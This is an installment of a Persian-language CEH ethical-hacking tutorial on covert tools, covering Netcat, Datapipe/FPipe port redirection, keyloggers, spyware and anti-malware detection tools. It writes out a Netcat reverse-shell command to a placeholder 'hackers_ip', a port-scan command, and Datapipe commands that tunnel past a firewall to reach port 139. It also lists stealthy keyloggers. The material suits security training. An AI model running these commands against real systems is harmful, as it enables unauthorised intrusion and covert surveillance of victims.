آموزش CEH (هکر کلاه سفید): ابزارهایی که برای استخراج اطلاعات استفاده می‌شوند

برای مطالعه قسمت قبل آموزش رایگان  دوره CEH اینجا کلیک کنید.

اگر Netcat در سیستم قربانی در دسترس باشد، این امکان وجود دارد تا پوسته را به شکل مستقیم به سیستم هكر بازگرداند. ابتدا هکر باید یک سیستم گوش‌دهنده (listener) را با استفاده از فرمان زیر روی سیستم خود تنظیم کند.

nc -n -v -l -p80

در مرحله بعد هکر، فرمان زیر را از سیستم قربانی اجرا می‌کند.

nc -n hackers_ip 80 -e "cmd.exe"

پس از وارد شدن، این پوسته سیستم قربانی را به خط فرمان باز هکر متصل می‌کند. Netcat را می‌توان برای برای انجام کارهای دیگری همچون اسکن پورت‌ها و بارگذاری فایل‌ها استفاده کرد. برای اکسن پورت اسکن از فرمان زیر استفاده می‌شود.

nc -v -z -w1 IPaddress 1-1024

این فرمان به اسکن پورت‌های آدرس آی‌پی هدف می‌پردازد. گزینه -v یک اسکن اولیه انجام می‌دهد، در حالی که سوییچ -z به شکل دقیق‌تری این‌کار را انجام داده و -w1 اعلام می‌دارد قبل از time out یک ثانیه مکس شود، 1 تا 1024 نیز محمدوده پورت‌های TCP است که اسکن می‌شوند. Datapipe یک ابزار تغییردهنده پورت ویژه ویندوز، لینوکس و FreeBSB است. ترکیب نحوی ابزار Datapipe به شرح زیر است:

datapipe <localport> <remoteport> <remotehost>

به‌طور مثال، فرض کنید هکری به یک میزبان لینوکسی به آدرس آی‌پی 10.2.2.254 در یک شبکه نفوذ کرده و برنامه Datapipe را روی آن سیستم بارگذاری کرده است. حال، هکر دوست دارد یک نشست تهی روی یک سیستم ویندوزی به نشانی (10.2.2.2) در شبکه‌ای که در معرض خطر قرار گرفته ایجاد کند. مشکل این است که دیوارآتش پورت 139 را مسدود کرده است. بنابراین، هیچ راه مستقیمی برای هکر وجود ندارد که یک جلسه تهی را تنظیم کند. درست در این نقطه است که ابزار Datapipe به هکر کمک می‌کند. در این‌جا هکر از سیستم لینوکسی در معرض خطر قرار گرفته استفاده کرده تا فرمان زیر را اجرا کند.

datapipe 80 139 10.2.2.2

در ادامه در سیستم محلی لینوکس هکر فرمان زیر را وارد می‌کند.

datapipe 139 80 10.2.2.254

چه اتفاقی در این‌جا رخ داده است. سیستم لینوکسی مورد حمله هکر قرار گرفته و تا ترافیکی که از سیستمی ویندوزی به سمت آن وارد می‌شود را دریافت کرده و در ادامه با استفاده از تکنیک تغییر مسیر پورت ترافیک پورت 80 به سمت پورت 139 هدایت شود. پس از آن‌که ترافیک روی پورت 80 دریافت شد، به سادگی توسط دیوارآتش انتقال پیدا می‌کند. در سیستم محلی هکر، Datapipe فرمان می‌دهد که ترافیک پورت 80 دریافت شده و بر مبنای تکنیک تغییر پورت به سمت پورت 139 انتقال پیدا کند. در این مرحله با استفاده از ترافیکی که از دیوار آتش هدایت می‌شود،، می‌توان یک جلسه تهی تنظیم کرد. FPipe ابزار مشابه دیگری است که توسط Foundstone ساخته شده است. ابزار فوق یک تغییر مسیر‌دهنده پورت سیستم‌های ویندوزی است. این ابزار به هکرها اجازه می‌دهد محدودیت‌های دیوارآتش را دور بزنند.

کی‌لاگرها و جاسوس‌افزارها

کی‌لاگرها (keyloggers) نرم‌افزارها یا دستگاه‌های سخت‌افزاری هستند که برای ضبط هر نوع اطلاعات شخصی استفاده می‌شوند. برخی از این برنامه‌ها می‌توانند هر بار کلیک ماوس را ضبط کنند، آدرس وب‌سایت بازدید شده یا برنامه‌ای که باز شده را ضبط کنند. درست است که کی‌لاگر یک ابزار ارتباطی پنهان نیست، اما هکر را قادر می‌سازد به شکل پنهانی کارهایی دور از چشم کاربر انجام داده و روی فعالیت‌های او نظارت کند. برخی از این ابزارها به‌طور مخفیانه تمام اطلاعات را به یک آدرس ایمیلی از پیش تعریف و تنظیم شده توسط هکر ارسال می‌کنند.

نسخه نرم‌افزاری کی‌لاگرها شبیه به واسطی میان سیستم‌عامل و صفحه کلید قرار می‌گیرند. هکر ممکن است یک برنامه ضبط کلیدها برای قربانی ارسال کند و این‌کار را دقیقا شبیه به زمانی که تروجانی را برای سیستم قربانی ارسال می‌کند انجام دهد. پس از نصب، کی‌لاگر می‌تواند در خفا اطلاعات را ضبط کند. در شرایط عادی پیدا کردن کی‌لاگرها سخت است، مگر آن‌که بدانید به دنبال چه چیزی هستید.

روش‌هایی وجود دارد تا کی‌لاگرها را به‌طور کامل در سیستم‌عامل قربانی نامریی کرد تا افرادی که سیستم فایلی را آزمایش می‌کنند موفق نشوند آن‌را شناسایی کنند. برای تحقق این هدف، هکرها از یک کی‌لاگر سخت‌افزاری استفاده می‌کنند. این دستگاه‌ها معمولاً زمانی که کاربر از میز کار خود دور است روی سیستم او نصب می‌شوند. به‌طور کلی کی‌لاگرهای سخت‌افزاری به لحاظ نرم‌افزار کاملا ناشناخته هستند و تنها به شکل شهودی امکان پیدا کردن آن‌ها وجود دارد. کاربران خیلی کمی روزانه پشت میز کامپیوتر خود را چک می‌کنند، به همین دلیل اگر این ابزارهای سخت‌افزاری به درگاه کامپیوتری متصل شوند، قادر هستند اطلاعات زیادی در اختیار هکرها قرار دهند.

برای آن‌که انجام این‌کار به لحاظ قانونی مشکلی ایجاد نکند، در زمان نصب این نرم‌افزارها روی سامانه‌های کاربران یک سازمان، ابتدا باید با مدیران ارشد سازمانی صحبت کرده و در قرار داد کتبی آن‌ها را در جریان انجام این‌کار قرار دهید و همچنین خط‌مشی‌های امنیتی سازمان را بررسی کنید تا مشکلی از این بابت به وجود نیاید.

کی‌لاگرهای سخت‌افزاری

کی‌لاگرهای سخت‌افزاری سالیان متمادی است که برای اهداف مختلفی استفاده می‌شوند. کی‌لاگرهای سخت‌افزاری می‌توانند به شکل بی‌سیم یا با سیم استفاده شوند. کی‌لاگرهای بی‌سیم می‌توانند از طریق 802.11 یا بلوتوث ارتباط برقرار کنند و اطلاعات را دریافت کنند. در ارتباط با کی‌لاگرهای سیمی باید اطلاعات ذخیره شده توسط آن‌ها بازیابی شود. یکی از نمونه‌های رایج کی‌لاگرهای سیمی KeyGhost است. یک ابزار تجاری که به شکل آشکار در سراسر جهان استفاده می‌شود و توسط یک شرکت نیوزیلندی به‌نام KeyGhost Ltd  به نشانی (http://www.keyghost.com) به فروش می‌رسد. این دستگاه شبیه به یک آداپتور کوچک به نظر می‌رسد که و به صفحه‌کلیدی متصل به کامپیوتر وصل می‌شود. این وسیله به انرژی خارجی نیاز ندارد، به‌طور نامحدود قابل استفاده بوده و توسط هیچ نرم‌افزاری قابل شناسایی نیست.

کی‌لاگرهای نرم‌افزاری

نرم‌افزارهایی که برای روبایش کلیدها استفاده می‌شوند به شکل رایگان در اینترنت در دسترس مردم قرار دارند. در حالی که برخی از آن‌ها تجاری هستند، در مقابل برخی دیگر به شکل رایگان قابل استفاده هستند. از جمله کی‌لاگرهای معروف به موارد زیر می‌توان اشاره کرد:

■ Spy PC Keylogger: یک برنامه ویندوزی است که به شکل پنهان و در پایین‌ترین سطح سیستم‌عامل اجرا می‌شود. کشف برنامه پس از تغییر نام فایل برنامه و تغییر نام فایل‌های گزارش تقریباً غیرممکن است. حتا جست‌وجوی جامع هارددیسک نیز نمی‌تواند نشان دهد که چنین ابزاری روی یک سیستم نصب شده است.

■ Ghost Keylogger: Ghost Keylogger یک کی‌لاگر نرم‌افزاری مبتنی بر ویندوز است که هرگونه کلید تایپ شده توسط کاربر را درون یک فایل گزارش رمزنگاری شده ضبط می‌کند. فایل گزارش بر مبنای آدرس از پیش تعیین شده‌ای از طریق ایمیلی برای هکر ارسال می‌شود.

■ Veriato Investigator: این برنامه کلیدهای تایپ شده را ضبط کرده، از طریق ایمیل، نرم‌افزارهای چت یا برنامه‌های پیام‌رسان برای هکر ارسال می‌کند.

■ eBLASTER: این کی‌لاگر هر کرای انجام می‌دهد. کی‌لاگر فوق می‌تواند این انواع فعالیت‌ها را ثبت کند، اطلاعات را سازماندهی کند و گزارش‌های مفصلی را در فواصل زمانی مشخص به آدرس ایمیل از پیش تعیین شده ارسال کند.

جاسوس‌افزار

نرم‌افزارهای جاسوسی شکل دیگری از کدهای مخرب هستند که عملکردی شبیه به یک تروجان دارند. این برنامه‌ها بدون اطلاع کاربر روی سامانه او نصب می‌شوند، از دید کاربر پنهان هستند، به شنود فعالیت‌های انجام شده روی سامانه کاربر می‌پردازند، هرگونه تعامل آنلاین با اینترنت را زیر نظر می‌گیرند و هر بار سامانه کامپیوتری راه‌اندازی می‌شود در پس‌زمینه شروع به فعالیت می‌کنند. امروزه نرم‌افزارهای جاسوسی به یک مشکل بزرگ تبدیل شده‌اند. این نرم‌افزارها عمدتا به دلایل زیر استفاده می‌شوند:

■ نظارت: با هدف بررسی جست‌وجوهای آنلاین، محصولاتی که عمدتا خرید می‌کند، پست‌هایی که دوست داشته و آن‌ها را لایک کرده و مواردی از این دست استفاده می‌شوند. در ادامه این اطلاعات برای افراد شاغل در صنعت بازاریابی ارسال می‌شوند.

■ تبلیغات: برخی از شرکت‌ها برای تبلیغ محصولات خود به تولیدکنندگان جاسوس‌افزارها مبالغی را پرداخت می‌کنند تا نرم‌افزارهای خود را روی سامانه کاربران نصب کرده و به تبلیغ محصولات یک شرکت خاص بپردازند. به‌طور مثال، تولیدکننده محصولات جانبی برای گوشی‌های همراه ممکن است مبلغی به هکر پرداخت کند تا نزدیک به 100000 هزار تبلیغ را برای افراد مختلف ارسال کند. اگر سامانه‌ای که از آن استفاده می‌کنید به جاسوس‌افزاری آلوده شده باید در انتظار حجم افسارگسیخته‌ای از تبلیغات باشید. بیشتر مواقع، سایت‌های جاسوس‌افزاری و تولیدکنندگان از روش‌های پنهانی برای آلوده‌سازی کامپیوتر کاربران استفاده می‌کنند. در حالت کلی، یک نرم‌افزار ارسال‌کننده که به آن dropper می‌گویند و در اصل نام دیگری برای wrapper است استفاده می‌شود. dropper یک برنامه مستقل است که انواع مختلفی از بدافزارهای منفرد را به سامانه قربانیان تزریق می‌کند.

برنامه‌های جاسوسی مشابه تروجان‌ها از روش‌های مختلفی برای آلوده‌سازی سامانه کاربران استفاده می‌کنند. برای آن‌که جاسوس‌افزارها بتوانند دومرتبه روی سامانه قربانیان اجرا شوند، به‌طور معمول اطلاعات مربوطه درون رجیستری سیستم، پوشه راه‌انداز ویندوز، خطوط Windows load= یا run=، فایل Win.ini،  Shell-line یا Win.ini قرار می‌گیرند. جاسوس‌افزار، شبیه به تمامی بدافزارها ممکن است تغییراتی در فایل میزبانی اعمال کند تا امکان دانلود یا به‌روزرسانی نرم‌افزارهای امنیتی امکان‌پذیر نباشد یا ترافیک به سمت مسیرهایی که متنهی به سرورهای تبلیغاتی می‌شود هدایت شود و تبلیغات مدنظر هکر برای کاربر به نمایش در آیند. اگر با سیستم‌هایی روبرو شدید که جاسوس‌افزاری روی آن‌ها نصب شده، ابتدا به فایل hosts و سایر مکان‌هایی که پیش‌تر به آن‌ها اشاره کردیم نگاهی انداخته و در صورت امکان از نرم‌افزارهای پاک‌کننده جاسوس‌افزارها استفاده کنید.

بهتر است برای پویش دقیق یک سامانه بیش از یک نرم‌افزار ضدجاسوس افزار را استفاده کنید تا بتوانید به دقیق‌تر شکل آن‌ها را پیدا کنید. از جمله نرم‌افزارهای ضدجاسوسی می‌توان به موارد زیر اشاره کرد:

■ Ad-Aware: http://www.lavasoft.com/

■ Microsoft Anti Spyware: https://www.microsoft.com/security/default.aspx

■ HiJackThis: https://sourceforge.net/projects/hjt/

■ Spybot Search & Destroy: https://www.safer-networking.org/dl/

■ SpywareBlaster: http://www.brightfort.com/spywareblaster.html

تمهیدات ضد بدافزاری

پیشگیری همیشه بهتر از درمان است. اطمینان حاصل کنید که همیشه آخرین نسخه آنتی‌ویروس را در سیستم خود نصب کرده‌اید و سیستم به شکل پیکربندی شده که به‌روزرسانی‌ها را به شکل خودکار دریافت می‌کند. آموزش نقش مهمی در متوقف کردن فعالیت نرم‌افزارهای مخرب دارد. کلیه کاربران باید درباره خطرات باز کردن پیوست‌ها یا نرم‌افزارهایی که از منابع غیر معتبر دریافت شده‌اند اطلاعات کافی داشته باشند.

مایکروسافت از یک سیستم تأیید فایل‌های سیستمی استفاده می‌کند. سیستم فوق مانع از آن می‌شود تا فایل‌های مخرب جایگزین فایل‌های سیستمی محافظت شده شوند. فایل‌های محافظت شده اثرانگشتی دارند که توسط الگوریتم هش تولید می‌شود.

برنامه‌هایی شبیه به Tripwire نیز مفید هستند. Tripwire شما را قادر می‌سازد از اسنپ‌شات‌های دوره‌ای مربوطه به فایل‌ها برای مقایسه آن‌ها با نمونه قبلی استفاده کنید تا مطمئن شوید چیزی تغییر نکرده است.

  اگر تغییراتی رخ داده، از شما درخواست می‌کند این موضوع را تحقیق کنید. در حالت کلی یک کارشناس امنیتی باید از روش‌های مختلفی برای پیدا کردن تروجان‌ها استفاده کند که از آن جمله به موارد زیر می‌توان اشاره کرد:

■ پورت‌های مشکوک را اسکن کنید.

■ فرآیندهای مشکوک را اسکن کنید.

■ به دنبال فایل‌ها و پوشه‌های مشکوک باشید.

■ ورودی‌های رجیستری مشکوک را اسکن کنید.

■ درایوهای راه‌انداز مشکوک دستگاه‌ها را اسکن کنید.

■ سرویس‌های مشکوک ویندوز را اسکن کنید.

■ برنامه‌های راه‌انداز مشکوک را اسکن کنید.

نکته: اسکن رجیستری با هدف شناسایی تغییرات اعمال شده در آن کمی متفاوت از تغییر وضعیت فایل‌های سیستمی است. اگر زمانی متوجه شدید یک کلید یا زیرکلیدی در رجیستری تغییر پیدا کرده، باید اطلاعات تغییر پیدا کرده را بررسی کنید.

شناسایی بدافزارها

بررسی نشانه‌ها و شواهدی که اجازه می‌دهند فعالیت‌های مخرب را تجزیه و تحلیل کنید فراتر از حوصله این آموزش است، اما به‌خاطر داشته باشید که پیدا کردن و ارزیابی تروجان‌ها می‌تواند به کارهای زیادی نیاز داشته باشد. به عنوان مثال، در نظر بگیرید که شخصی تروجانی را نصب کرده است تا آن‌را به عنوان C: \ Windows \ temp \ svchost.exe اجرا کند. یک تحلیل ساده با استفاده از Task Manager معمولاً نسخه‌های مختلفی از اجرای svchost.exe را نشان می‌دهد. شما نمی‌توانید به نام پردازه،PID ، PID والد یا زمان ساخت تکیه کنید تا متوجه شوید کدامیک از پردازه‌های svchost.exe مخرب هستند. لازم است تا PEB سرنام Process Environment Block را به دقت ارزیابی کنید تا مسیر کامل یک پردازه روی دیسک را شناسایی کنید. تنها در این صورت است که می‌توانید بگویید آیا فرآیندی از یک دایرکتوری غیر استاندارد اجرا شده یا خیر. هسته ویندوز فرآیندها را با اختصاص یک ساختار EPROCESS منحصر به فرد که درون حافظه کرنل قرار دارد و در حالت nonpaged pool قرار دارد ردیابی می‌کند. دسترسی به این داده‌ها به ابزارهای تخصصی مختلفی نیاز دارد که از جمله آن‌ها به موارد زیر می‌توان اشاره کرد:

■ Process Monitor: Process Monitor می‌تواند اطلاعات موقتی مانند نام فرآیندهایی که تغییر پیدا کرده‌اند را ضبط کند. همچنین اجازه می‌دهد معیارهایی را برای محدود کردن فرآیند ضبط اطلاعات استفاده کنید.

■ Task Manager: مولفه داخلی ویندوز است که اطلاعات دقیقی در مورد کلیه فرآیندهای در حال اجرا ارائه می‌کند.

■ Ps: فرمان استفاده شده برای نمایش فرآیندهای در حال اجرا در سیستم‌های UNIX / Linux است.

■ Netstat: اتصالات فعال مبتنی بر TCP، پورت‌هایی که کامپیوتر در آن گوش دادن به آن‌ها است، گزارش آماری اترنت، جدول مسیریابی آی‌پی، گزارش آماری IPv4 و موارد از این دست را نشان می‌دهد. Netstat -an فهرستی از درگاه‌ها و فرآیندهای باز را نشان می‌دهد.

■ CurrPorts: ابزاری ویندوزی است که قادر است فهرستی از فرآیندهای در حال اجرا روی دستگاه محلی را نشان دهد.

■ TCPView: یک ابزار GUI است که توسط Sysinternals ساخته شده و اکنون توسط مایکروسافت پشتیبانی می‌شود. این ابزارها فرآیندهای در حال اجرا را نشان می‌دهد.

■ Microsoft Computer Management Console: می‌تواند برای بررسی وظایف، رویدادها و عملکرد دستگاه محلی استفاده شود. برای اجرای آن کافی است در پنجره run فرمان compmgmt.msc را اجرا کنید.

■ Process Viewer: یکی دیگر از ابزارهای ویندوز است که اطلاعات دقیقی در مورد فرآیندهای در حال اجرا نشان می‌دهد. نمایش وضعیت حافظه، ریسمان‌ها و ماژول‌های استفاده شده از جمله این موارد است.

■ IceSword: ابزاری است که فرآیندهای موجود در سیستم ویندوز و پورت‌هایی که هرکدام به آن گوش می‌دهند را نشان می‌دهد. از ابزار فوق می‌توان برای پیدا کردن تروجان‌هایی که ممکن است خود را به فرآیندهای دیگر تزریق کرده‌اند استفاده کرد.

■ Regshot: یک برنامه مستقل متن‌باز است که اجازه می‌دهد یک مقایسه سریع میان دو اسنپ‌شات انجام دهید و به این شکل تغییرات رخ داده در سیستم فایلی و رجیستری را بررسی کنید.

در شماره آینده مبحث فوق را ادامه می‌دهیم.

برای مطالعه رایگان تمام بخش‌های دوره CEH  روی لینک زیر کلیک کنید:

آموزش رایگان دوره CEH